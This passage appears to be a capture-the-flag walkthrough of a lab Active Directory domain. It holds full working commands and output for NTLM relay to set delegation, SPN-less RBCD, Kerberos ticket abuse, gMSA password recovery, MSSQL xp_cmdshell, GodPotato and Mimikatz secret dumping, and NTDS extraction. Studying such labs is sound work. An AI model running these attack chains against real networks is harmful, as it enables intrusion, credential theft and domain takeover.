NetNTLMv2 (or just NTLMv2) has a message integrity code (MIC) that covers the entire authentication exchange, including which protocol is being used. If an attacker tries to take an SMB authentication and present it to LDAP, the MIC validation fails. NTLMv1 has no MIC, so I can intercept the SMB authentication from JOLLYROGER and replay it to the DC over LDAP. The DC has no way to know the original auth was meant for SMB. I’ll relay the authentication as JOLLYROGER$ to configure RBCD, allowing a user I control to impersonate any user (like Administrator) to JOLLYROGER.
Typically RBCD requires an account with an SPN, which I don’t have here. However, as I showed in Phantom, there is a way to make this work using a standard user account based on this research by James Forshaw. S4U2Proxy validates delegation by checking that the requesting account can decrypt the session key in the forwarded ticket. By setting the user’s password such that their NTLM hash matches the TGT session key, I can satisfy this check without needing an SPN.
Set RBCD
I’ll kill Responder and start ntlmrelayx with the following options:
-t ldap://blackpearl.pirates.brb - The target to relay to, which is LDAP on the DC.
--delegate-acces - Configure RBCD.
--escalate-user barnacle - This specifies the account that will get the RBCD privileges on JOLLYROGER.
--remove-mic - Strip the MIC from the NTLMv1 authentication if it is present, which is required for SMB to LDAP cross-protocol relaying.
-smb2support - Allows the relay listener to use SMB2 and SMB3.
I’ll run this, and then coerce JOLLYROGER again. At the relay:
oxdf@hacky$ ntlmrelayx.py -t ldap://blackpearl.pirates.brb --delegate-access--escalate-user barnacle --remove-mic-smb2supportImpacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Protocol Client SMTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client WINRMS loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client DCSYNC loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Setting up WinRM (HTTP) Server on port 5985
[*] Setting up WinRMS (HTTPS) Server on port 5986
[*] Setting up RPC Server on port 135
[*] Multirelay disabled
[*] Servers started, waiting for connections
[*] (SMB): Received connection from 10.2.10.11, attacking target ldap://blackpearl.pirates.brb
[*] (SMB): Authenticating connection from PIRATES/JOLLYROGER$@10.2.10.11 against ldap://blackpearl.pirates.brb SUCCEED [1]
[*] ldap://PIRATES/JOLLYROGER$@blackpearl.pirates.brb [1] -> Enumerating relayed user's privileges. This may take a while on large domains
[*] All targets processed!
[*] (SMB): Connection from 10.2.10.11 controlled, but there are no more targets left!
[*] ldap://PIRATES/JOLLYROGER$@blackpearl.pirates.brb [1] -> Delegation rights modified succesfully!
[*] ldap://PIRATES/JOLLYROGER$@blackpearl.pirates.brb [1] -> barnacle can now impersonate users on JOLLYROGER$ via S4U2Proxy
[*] All targets processed!
I can verify that it worked:
oxdf@hacky$rbcd.py -delegate-to'JOLLYROGER$'-actionread-dc-ip 10.2.10.10 'pirates.brb/barnacle:First927&^!'Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Accounts allowed to act on behalf of other identity:
[*] barnacle (S-1-5-21-4043891078-2160160696-1017773601-1108)
Authenticate
Set Password for barnacle
Because barnacle doesn’t have a SPN, I need to set it’s password such that the NTLM hash matches the TGT session key, following the steps on The Hacker Recipes. I’ll start by getting a TGT as barnacle:
oxdf@hacky$getTGT.py pirates.brb/barnacle:'First927&^!'Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in barnacle.ccache
From it, I can get the session key:
oxdf@hacky$describeTicket.py barnacle.ccache
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Number of credentials in cache: 1
[*] Parsing credential[0]:
[*] Ticket Session Key : 8515665e75c2ed8d4504b7359736f7e22ee9e7dd00d37f5dbf0a222c0c39527a
[*] User Name : barnacle
[*] User Realm : PIRATES.BRB
[*] Service Name : krbtgt/PIRATES.BRB
[*] Service Realm : PIRATES.BRB
[*] Start Time : 25/01/2026 18:00:08 PM
[*] End Time : 26/01/2026 04:00:08 AM
[*] RenewTill : 26/01/2026 18:00:06 PM
[*] Flags : (0x50e10000) forwardable, proxiable, renewable, initial, pre_authent, enc_pa_rep
[*] KeyType : aes256_cts_hmac_sha1_96
[*] Base64(key) : hRVmXnXC7Y1FBLc1lzb34i7p590A039dvwoiLAw5Uno=
[*] Decoding unencrypted data in credential[0]['ticket']:
[*] Service Name : krbtgt/PIRATES.BRB
[*] Service Realm : PIRATES.BRB
[*] Encryption type : aes256_cts_hmac_sha1_96 (etype 18)
[-] Could not find the correct encryption key! Ticket is encrypted with aes256_cts_hmac_sha1_96 (etype 18), but no keys/creds were supplied
Unfortunately, this key is using AES, which is why the session key is so much longer than an NTLM. Instead of passing the password when requesting the TGT, I’ll pass the NTLM. Without the actual password, the DC can’t generate AES keys, and will fallback to RC4:
oxdf@hacky$getTGT.py -hashes :$(pypykatz crypto nt 'First927&^!')'pirates.brb'/'barnacle'Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in barnacle.ccache
oxdf@hacky$describeTicket.py 'barnacle.ccache' | grep'Ticket Session Key'[*] Ticket Session Key : cda434c15dca3d90a11e0202048e2f96
Now I’ll update their password using -nethashes to set it to a specific hash:
oxdf@hacky$changepasswd.py -newhashes :cda434c15dca3d90a11e0202048e2f96 pirates.brb/barnacle:'First927&^!'@blackpearl.pirates.brb
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Changing the password of pirates.brb\barnacle
[*] Connecting to DCE/RPC as pirates.brb\barnacle
[*] Password was changed successfully.
[!] User might need to change their password at next logon because we set hashes (unless password never expires is set).
Get ST as Administrator
Now I request a service ticket as the barnacle user on JOLLYROGER. Because of the RBCD, I can request it for any user, so I’ll ask for administrator:
This ticket will be good for the CIFS service (SMB). It works:
oxdf@hacky$KRB5CCNAME=Administrator@cifs_JOLLYROGER.pirates.brb@PIRATES.BRB.ccache netexec smb jollyroger.pirates.brb --use-kcacheSMB jollyroger.pirates.brb 445 JOLLYROGER [*] Windows Server 2022 Build 20348 x64 (name:JOLLYROGER) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB jollyroger.pirates.brb 445 JOLLYROGER [+] pirates.brb\Administrator from ccache (Pwn3d!)
Shell
wmiexec.py
With this ticket, I’ll get a shell using wmiexec.py (from Impacket):
oxdf@hacky$KRB5CCNAME=Administrator@cifs_JOLLYROGER.pirates.brb@PIRATES.BRB.ccache wmiexec.py -k-no-pass JOLLYROGER.pirates.brb
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoamipirates\administrator
In the root of C: there’s a Flag directory:
C:\>dir Volume in drive C is Windows 2022
Volume Serial Number is 00E8-658E
Directory of C:\
01/23/2026 04:08 PM <DIR> Caddy
01/23/2026 03:57 PM 683 dns_log.txt
01/23/2026 04:08 PM <DIR> Flag
01/23/2026 03:46 PM <DIR> ludus
05/08/2021 03:20 AM <DIR> PerfLogs
01/23/2026 03:49 PM <DIR> Program Files
05/08/2021 04:40 AM <DIR> Program Files (x86)
01/23/2026 04:09 PM <DIR> setup
01/23/2026 04:02 PM <DIR> tmp
01/25/2026 10:55 AM <DIR> TREASOR_HUNT
01/23/2026 04:08 PM <DIR> Users
01/23/2026 04:08 PM <DIR> Websites
01/25/2026 01:19 PM <DIR> Windows
1 File(s) 683 bytes
12 Dir(s) 252,560,666,624 bytes free
It has the next flag:
C:\Flag>type flag.txt
brb{c4e5da3432481f8b0eb6ba4a86e5d4b9}
Congratulations! You've compromised JOLLYROGER via NTLMv1 relay and SPN-less RBCD!
🏁 Flag 4brb{c4e5da3432481f8b0eb6ba4a86e5d4b9}
Evil-WinRM
I can also get a WinRM connection, but I’ll need a service ticket for the HTTP service rather than the CIFS:
ironhook can read and write to the ISLAND2 share on QUEENREV. I’ll connect, and find one file:
oxdf@hacky$smbclient //queenrev.pirates.brb/ISLAND2 -U'ironhook'-W pirates.brb --password='brb{5d26ec0024167fdf8a45a70eff4ade36}'Try "help" to get a list of possible commands.
smb: \>ls . D 0 Sun Jan 25 20:18:13 2026
.. DHS 0 Sat Jan 24 21:24:10 2026
shipping.txt A 1132 Fri Jan 23 21:09:19 2026
65535487 blocks of size 4096. 61106599 blocks available
smb: \>get shipping.txt
getting file \shipping.txt of size 1132 as shipping.txt (2.5 KiloBytes/sec) (average 2.5 KiloBytes/sec)
The file has a msDS-ManagedPassword:
Just found this on the back of the ship, is this sensitive information ?
Account: gMSA-shipping$
msDS-ManagedPassword:
1,0,0,0,34,1,0,0,16,0,0,0,18,1,26,1,82,84,59,147,143,27,162,110,48,225,198,244,36,227,108,79,224,49,235,253,184,93,113,4,65,240,14,250,4,197,61,202,75,47,212,193,214,45,93,7,161,73,130,152,130,209,102,110,19,220,185,93,49,136,139,191,178,235,177,196,69,36,236,136,224,141,166,243,71,139,161,135,9,167,234,246,7,75,10,204,120,211,55,47,109,52,74,49,25,10,224,176,217,222,145,227,208,168,25,207,235,41,45,226,61,67,131,252,35,90,154,168,18,33,93,234,34,132,128,115,253,101,76,132,144,103,90,205,178,173,54,6,221,152,164,23,208,22,245,94,158,107,155,144,127,76,147,16,170,12,103,31,163,25,60,82,77,215,222,94,33,207,16,80,249,101,136,233,57,186,99,135,214,27,24,118,104,210,131,26,214,86,100,216,131,58,180,43,73,57,63,244,239,141,97,10,245,51,119,209,109,47,159,114,43,88,178,208,124,204,65,183,246,143,42,91,68,105,13,150,214,59,254,226,37,202,243,59,176,127,164,92,102,167,199,66,66,159,221,241,76,135,165,68,122,222,224,50,24,215,150,252,80,36,117,58,0,0,213,9,135,74,137,23,0,0,213,171,182,151,136,23,0,0
Recover NTLM Hash
Group Managed Service Accounts (GMSA) are AD accounts with automatically rotated passwords that authorized computers can retrieve. The msDS-ManagedPassword attribute contains the password blob, which is normally only readable by specific accounts. Someone appears to have dumped this attribute and left it in a file on the share. With the raw blob, I can parse the password bytes and compute the NTLM hash.
Claude was able to help me write a Python script to recover the NTLM hash of the GMSA password stored here:
# /// script
# requires-python = ">=3.13"
# dependencies = [
# "pycryptodome",
# ]
# ///
importhashlibimportstructfromCrypto.HashimportMD4blob_str="1,0,0,0,34,1,0,0,16,0,0,0,18,1,26,1,82,84,59,147,143,27,162,110,48,225,198,244,36,227,108,79,224,49,235,253,184,93,113,4,65,240,14,250,4,197,61,202,75,47,212,193,214,45,93,7,161,73,130,152,130,209,102,110,19,220,185,93,49,136,139,191,178,235,177,196,69,36,236,136,224,141,166,243,71,139,161,135,9,167,234,246,7,75,10,204,120,211,55,47,109,52,74,49,25,10,224,176,217,222,145,227,208,168,25,207,235,41,45,226,61,67,131,252,35,90,154,168,18,33,93,234,34,132,128,115,253,101,76,132,144,103,90,205,178,173,54,6,221,152,164,23,208,22,245,94,158,107,155,144,127,76,147,16,170,12,103,31,163,25,60,82,77,215,222,94,33,207,16,80,249,101,136,233,57,186,99,135,214,27,24,118,104,210,131,26,214,86,100,216,131,58,180,43,73,57,63,244,239,141,97,10,245,51,119,209,109,47,159,114,43,88,178,208,124,204,65,183,246,143,42,91,68,105,13,150,214,59,254,226,37,202,243,59,176,127,164,92,102,167,199,66,66,159,221,241,76,135,165,68,122,222,224,50,24,215,150,252,80,36,117,58,0,0,213,9,135,74,137,23,0,0,213,171,182,151,136,23,0,0"blob=bytes([int(x)forxinblob_str.split(',')])# Parse MSDS-MANAGEDPASSWORD_BLOB structure
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e
version=struct.unpack('<H',blob[0:2])[0]reserved=struct.unpack('<H',blob[2:4])[0]length=struct.unpack('<I',blob[4:8])[0]curr_pw_offset=struct.unpack('<H',blob[8:10])[0]prev_pw_offset=struct.unpack('<H',blob[10:12])[0]query_interval_offset=struct.unpack('<H',blob[12:14])[0]unchanged_interval_offset=struct.unpack('<H',blob[14:16])[0]print(f"Version: {version}")print(f"Length: {length}")print(f"Current Password Offset: {curr_pw_offset}")print(f"Previous Password Offset: {prev_pw_offset}")# Extract current password (256 bytes of UTF-16LE)
# Password is from curr_pw_offset to prev_pw_offset (or query_interval_offset if no prev)
# Remove two bytes of null from the end before hashing
ifprev_pw_offset>0:pw_end=prev_pw_offsetelse:pw_end=query_interval_offsetpassword_bytes=blob[curr_pw_offset:pw_end-2]print(f"Password length: {len(password_bytes)} bytes")# Calculate NTLM hash (MD4 of the password bytes)
ntlm_hash=MD4.new(password_bytes).hexdigest()print(f"NTLM Hash: {ntlm_hash}")
Recovering the password bytes is just a matter of parsing the structure according to this documentation from Microsoft. The result will not be ASCII characters since it’s a GMSA password, so I’ll create an NTLM (making sure to remove the two bytes of trailing nulls). It gives a hash:
These new creds don’t offer anything different on SMB or in BloodHound. But there is something new on MSSQL:
oxdf@hacky$mssqlclient.py pirates.brb/'gmsa-shipping$'@queenrev.pirates.brb -hashes :5206b1ce067ccab31c0ae1ea1c3fa267 -windows-authImpacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUEENREV\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(QUEENREV\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2019 RTM (15.0.2000)
[!] Press help for extra shell commands
SQL (PIRATES\gMSA-shipping$ guest@master)>use SECRET_GOLD
ERROR(QUEENREV\SQLEXPRESS): Line 1: The server principal "PIRATES\gMSA-shipping$" is not able to access the database "SECRET_GOLD" under the current security context.
Just like above, I can’t access the SECRET_GOLD database. However, the gmsa-shipping$ user has impersonation privileges:
SQL (PIRATES\gMSA-shipping$ guest@master)>enum_impersonateexecute as database permission_name state_desc grantee grantor
---------- -------- --------------- ---------- ---------------------- -------
b'LOGIN' b'' IMPERSONATE GRANT PIRATES\gMSA-shipping$ sa
SQL (sa dbo@master)>USESECRET_GOLD;ENVCHANGE(DATABASE): Old Value: master, New Value: SECRET_GOLD
INFO(QUEENREV\SQLEXPRESS): Line 1: Changed database context to 'SECRET_GOLD'.
SQL (sa dbo@SECRET_GOLD)>
SQL (sa dbo@SECRET_GOLD)>select*fromisland;id name comment
-- ------------------ --------------------------------------
1 Tortuga Famous pirate hideout in the Caribbean
2 Isla de Muerta Mysterious island shrouded in legend
3 Shipwreck Cove Where many pirate ships met their end
4 Skull Island Dangerous island with hidden treasure
5 Blackbeard's Haven Haven for Blackbeard's crew
6 Dead Man's Cay Haunted by ghostly pirates
7 Redbeard Reef Treacherous reefs claimed many ships
8 Cutthroat Isle Home to the fiercest pirate crews
9 Rumrunner's Bay Pirates loved their rum here
10 Golden Skull Atoll brb{c37c5303024c911bb23a759d0f4cad75}
One of which is the next flag:
🏁 Flag 6brb{c37c5303024c911bb23a759d0f4cad75}
Command Execution
POC
xp_cmdshell is still disabled:
SQL (sa dbo@SECRET_GOLD)>xp_cmdshellwhoamiERROR(QUEENREV\SQLEXPRESS): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
As sa, I can enable it:
SQL (sa dbo@SECRET_GOLD)>enable_xp_cmdshellINFO(QUEENREV\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
INFO(QUEENREV\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (sa dbo@SECRET_GOLD)>xp_cmdshellwhoamioutput
---------------------------
nt service\mssql$sqlexpress
NULL
SeImpersonatePrivilege
Before going right for a shell, I’ll see that the service user has SeImpersonatePrivilege:
SQL (sa dbo@SECRET_GOLD)>xp_cmdshell"whoami /priv"output
--------------------------------------------------------------------------------
NULL
PRIVILEGES INFORMATION
----------------------
NULL
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
NULL
I’ll download a copy of GodPotato and host it with a Python webserver. Then I can upload it to QUEENREV:
I wasn’t able to get this to work in one shot, so I’ll break it into parts. First I’ll save a PowerShell#3 base64 reverse shell from revshells.com to shell.ps1 on my host, and then run it::
These are only machine account tickets, which means no user sessions to hijack.
Hashes with Mimikatz
I’ll grab a copy of Mimikatz and upload it to QUEENREV. I don’t trust this shell to handle the mimikatz interactive shell, but I can run all the commands I need at once:
PS C:\windows\tasks>.\m.exe"privilege::debug""lsadump::secrets""exit"
.#####. mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # lsadump::secrets
Domain : QUEENREV
SysKey : 60ddedbade372237d03eb96e6e858955
Local name : QUEENREV ( S-1-5-21-2988287974-229756792-1271916865 )
Domain name : PIRATES ( S-1-5-21-4043891078-2160160696-1017773601 )
Domain FQDN : PIRATES.BRB
Policy subsystem is : 1.18
LSA Key(s) : 1, default {5a94dfd4-c958-a470-2ec5-a1fec69e0c8d}
[00] {5a94dfd4-c958-a470-2ec5-a1fec69e0c8d} f80ac6951f5f4ad6b21fac3fb47c03b8edc96b7bc75f33f9db2da13801616bf4
Secret : $MACHINE.ACC
cur/text: zup1UyZa>K%)fFLzvYm4SFrsAzDIfAnG`H"rg\_WE`5hXnub9B9n`DCT]=gRH%-(TWA`rX;NX36w_qR"v(yp4,\y^x<y+;832rc\N\q+y/WAu''_pXD2e'kw
NTLM:900af3fd1cef2f7a245b8ebe42fdaee3
SHA1:d7c8445210f828d6f8896c898b373e1966efd969
old/text: zup1UyZa>K%)fFLzvYm4SFrsAzDIfAnG`H"rg\_WE`5hXnub9B9n`DCT]=gRH%-(TWA`rX;NX36w_qR"v(yp4,\y^x<y+;832rc\N\q+y/WAu''_pXD2e'kw
NTLM:900af3fd1cef2f7a245b8ebe42fdaee3
SHA1:d7c8445210f828d6f8896c898b373e1966efd969
Secret : DefaultPassword
cur/text: password
old/text: password
Secret : DPAPI_SYSTEM
cur/hex : 01 00 00 00 36 2a 08 f1 39 5e 5b f8 83 87 d7 95 74 5b 53 22 3c 60 00 7f 56 99 c9 69 c6 e4 be 5f 82 cf b0 0e 00 c9 cf fd 93 df d3 8c
full: 362a08f1395e5bf88387d795745b53223c60007f5699c969c6e4be5f82cfb00e00c9cffd93dfd38c
m/u : 362a08f1395e5bf88387d795745b53223c60007f / 5699c969c6e4be5f82cfb00e00c9cffd93dfd38c
old/hex : 01 00 00 00 b0 9c ab 68 4a b5 f2 a1 59 8a d1 fb c0 39 37 25 84 4c 37 ab 51 ef e8 0b ae 59 c3 f7 64 bf f1 fe 57 9e 57 2b 12 22 70 1f
full: b09cab684ab5f2a1598ad1fbc0393725844c37ab51efe80bae59c3f764bff1fe579e572b1222701f
m/u : b09cab684ab5f2a1598ad1fbc0393725844c37ab / 51efe80bae59c3f764bff1fe579e572b1222701f
Secret : NL$KM
cur/hex : 83 2e f0 24 26 5b 48 fa 47 e3 cb 6e 93 07 26 99 b0 3e 67 5d 81 8f 6b c0 a5 e0 48 80 59 4a 68 a2 36 bf 6c 9c aa ab dd 52 f7 e4 7a 8b 42 c8 01 cf e2 f4 f7 16 5e cc d2 a0 b3 7a 80 48 7e 66 e1 7f
old/hex : 83 2e f0 24 26 5b 48 fa 47 e3 cb 6e 93 07 26 99 b0 3e 67 5d 81 8f 6b c0 a5 e0 48 80 59 4a 68 a2 36 bf 6c 9c aa ab dd 52 f7 e4 7a 8b 42 c8 01 cf e2 f4 f7 16 5e cc d2 a0 b3 7a 80 48 7e 66 e1 7f
Secret : _SC_MSSQL$SQLEXPRESS / service 'MSSQL$SQLEXPRESS' with username : NT SERVICE\MSSQL$SQLEXPRESS
old/text: MSSQLadmin2025Pirates
Secret : _SC_SQLTELEMETRY$SQLEXPRESS / service 'SQLTELEMETRY$SQLEXPRESS' with username : NT Service\SQLTELEMETRY$SQLEXPRESS
mimikatz(commandline) # exit
Bye!
A couple potentially useful bits here:
“MSSQLadmin2025Pirates” is a password for the MSSQL service account, NT SERVICE\MSSQL$SQLEXPRESS.
The machine account, QUEENREV$, has an NTLM hash of 900af3fd1cef2f7a245b8ebe42fdaee3.
Abuse Delegation
Strategy
QUEENREV$ has constrained delegation to FLYINGDUTCHMAN, but without protocol transition. If protocol transition were enabled, QUEENREV$ could simply use S4U2Self to request a ticket for Administrator to itself, then forward that to FLYINGDUTCHMAN via S4U2Proxy. But without protocol transition, QUEENREV$ cannot request tickets on behalf of arbitrary users. It needs someone to hand it a forwardable ticket first.
To work around this, I’ll chain RBCD with the constrained delegation:
Configure RBCD on QUEENREV$ to trust JOLLYROGER$ (an account I control with an SPN)
As JOLLYROGER$, use S4U2Self to get a forwardable ticket for Administrator to JOLLYROGER
As JOLLYROGER$, use S4U2Proxy to get a ticket for Administrator to QUEENREV (this ticket is forwardable because of the RBCD trust)
As QUEENREV$, use S4U2Proxy via constrained delegation to forward that ticket to FLYINGDUTCHMAN
The end result is a service ticket as Administrator on FLYINGDUTCHMAN.
Configure RBCD
With the hash for the QUEENREV$ machine account, I’ll configure RBCD allowing an account I control with an SPN (JOLLYROGER$) the ability to impersonate QUEENREV$:
oxdf@hacky$ rbcd.py pirates.brb/'QUEENREV$'-hashes :900af3fd1cef2f7a245b8ebe42fdaee3 -dc-ip BLACKPEARL.pirates.brb -action write -delegate-from'JOLLYROGER$'-delegate-to'QUEENREV$'Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] JOLLYROGER$ can now impersonate users on QUEENREV$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] JOLLYROGER$ (S-1-5-21-4043891078-2160160696-1017773601-1106)
findDelegation.py will show this now:
oxdf@hacky$ findDelegation.py pirates.brb/plankwalker:'Entry284*@&'Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
AccountName AccountType DelegationType DelegationRightsTo SPN Exists
----------- ----------- ----------------------------------- ------------------------------- ----------
BLACKPEARL$ Computer Unconstrained N/A Yes
JOLLYROGER$ Computer Resource-Based Constrained QUEENREV$ No
QUEENREV$ Computer Constrained w/o Protocol Transition host/FLYINGDUTCHMAN.PIRATES.BRB Yes
barnacle Person Resource-Based Constrained JOLLYROGER$ No
Get ST Administrator to QUEENREV
With the delegation in place, I can request a ticket for Administrator to QUEENREV using the hash for JOLLYROGER$ (from the secretsdumpabove):
oxdf@hacky$getST.py -spn host/QUEENREV.pirates.brb -impersonate Administrator pirates.brb/'JOLLYROGER$'-hashes :2e0359cc6cf2573663656af8a382b087 -dc-ip BLACKPEARL.pirates.brb
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@host_QUEENREV.pirates.brb@PIRATES.BRB.ccache
The resulting ticket works:
oxdf@hacky$KRB5CCNAME=Administrator@host_QUEENREV.pirates.brb@PIRATES.BRB.ccache netexec smb queenrev.pirates.brb --use-kcacheSMB queenrev.pirates.brb 445 QUEENREV [*] Windows Server 2022 Build 20348 x64 (name:QUEENREV) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB queenrev.pirates.brb 445 QUEENREV [+] pirates.brb\Administrator from ccache (Pwn3d!)
Get ST Administrator to FLYINGDUTCHMAN
I’ll pass that ticket along with the QUEENREV$ machine account hash to get a ticket for Administrator on FLYINGDUTCHMAN:
oxdf@hacky$getST.py -spn host/FLYINGDUTCHMAN.PIRATES.BRB -impersonate Administrator -additional-ticket Administrator@host_QUEENREV.pirates.brb@PIRATES.BRB.ccache pirates.brb/'QUEENREV$'-hashes :900af3fd1cef2f7a245b8ebe42fdaee3 -dc-ip BLACKPEARL.pirates.brb
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Using additional ticket Administrator@host_QUEENREV.pirates.brb@PIRATES.BRB.ccache instead of S4U2Self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@host_FLYINGDUTCHMAN.PIRATES.BRB@PIRATES.BRB.ccache
This ticket works:
oxdf@hacky$KRB5CCNAME=Administrator@host_FLYINGDUTCHMAN.PIRATES.BRB@PIRATES.BRB.ccache netexec smb flyingdutchman.pirates.brb --use-kcacheSMB flyingdutchman.pirates.brb 445 FLYINGDUTCHMAN [*] Windows Server 2022 Build 20348 x64 (name:FLYINGDUTCHMAN) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB flyingdutchman.pirates.brb 445 FLYINGDUTCHMAN [+] pirates.brb\Administrator from ccache (Pwn3d!)
I’ll use wmiexec.py to get a shell:
oxdf@hacky$KRB5CCNAME=Administrator@host_FLYINGDUTCHMAN.PIRATES.BRB@PIRATES.BRB.ccache wmiexec.py -k-no-pass flyingdutchman.pirates.brb
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoamipirates\administrator
C:\>hostnameFLYINGDUTCHMAN
There’s a Flag directory:
C:\>dir Volume in drive C is Windows 2022
Volume Serial Number is 00E8-658E
Directory of C:\
01/23/2026 04:09 PM <DIR> BACKUP
01/23/2026 03:57 PM 683 dns_log.txt
01/23/2026 04:08 PM <DIR> Flag
01/23/2026 03:46 PM <DIR> ludus
05/08/2021 03:20 AM <DIR> PerfLogs
01/23/2026 03:49 PM <DIR> Program Files
05/08/2021 04:40 AM <DIR> Program Files (x86)
01/23/2026 04:02 PM <DIR> tmp
01/23/2026 03:50 PM <DIR> Users
01/25/2026 07:23 PM <DIR> Windows
1 File(s) 683 bytes
9 Dir(s) 252,577,316,864 bytes free
There’s a BACKUP directory at the root of the C: drive on FLYINGDUTCHMAN. Inside is NTDS and NTDS.zip:
C:\BACKUP>dir Volume in drive C is Windows 2022
Volume Serial Number is 00E8-658E
Directory of C:\BACKUP
01/23/2026 04:09 PM <DIR> .
01/23/2026 04:08 PM <DIR> NTDS
01/23/2026 04:09 PM 5,147,724 NTDS.zip
1 File(s) 5,147,724 bytes
2 Dir(s) 252,577,320,960 bytes free
The directories are empty. I’ll grab a copy of the zip archive:
oxdf@hacky$KRB5CCNAME=Administrator@host_FLYINGDUTCHMAN.PIRATES.BRB@PIRATES.BRB.ccache netexec smb flyingdutchman.pirates.brb --use-kcache--get-file"/BACKUP/NTDS.ZIP" NTDS.zip
SMB flyingdutchman.pirates.brb 445 FLYINGDUTCHMAN [*] Windows Server 2022 Build 20348 x64 (name:FLYINGDUTCHMAN) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB flyingdutchman.pirates.brb 445 FLYINGDUTCHMAN [+] pirates.brb\Administrator from ccache (Pwn3d!)SMB flyingdutchman.pirates.brb 445 FLYINGDUTCHMAN [*] Copying "/BACKUP/NTDS.ZIP" to "NTDS.zip"
SMB flyingdutchman.pirates.brb 445 FLYINGDUTCHMAN [+] File "/BACKUP/NTDS.ZIP" was downloaded to "NTDS.zip"
It has the ntds.dit and ntds.jfm files, as well as backups of the SECURITY and SYSTEM registry hives:
Nothing again. All the users must have changed their password.
ntds.dit Details
I’ll use ntdissector to convert the ntds.dit file into JSON files:
oxdf@hacky$ntdissector -ntds"NTDS/Active Directory/ntds.dit"-system"NTDS/registry/SYSTEM"-outputdir.[*] PEK # 0 found and decrypted: 6ae0bab06d45d762e45769e13823395f
[*] Filtering records with this list of object classes : ['user', 'secret', 'group', 'domainDNS']
[*] Ignoring records marked as deleted
100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 3734/3734 [00:00<00:00, 11253.09rec./s]
[*] Finished, matched 101 records out of 3734
[*] Processing 101 serialization tasks
100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 101/101 [00:00<00:00, 666.49rec./s]
oxdf@hacky$ls out/0073cbb4a25fe52461c5fb5f94b5ce13/
domainDNS.json group.json user.json
I’ll use jq to get the accounts that have “descriptions”:
oxdf@hacky$cat out/0073cbb4a25fe52461c5fb5f94b5ce13/user.json | jq -rs'.[] | select(.description) | "\(.sAMAccountName): \(.description)"'krbtgt: Key Distribution Center Service Account
blackbeard: REDqC8aQtyhd78A
Guest: Built-in account for guest access to the computer/domain
Administrator: Built-in account for administering the computer/domain
blackbeard is is interesting!
Shell
That description string doesn’t work for the blackbeard user:
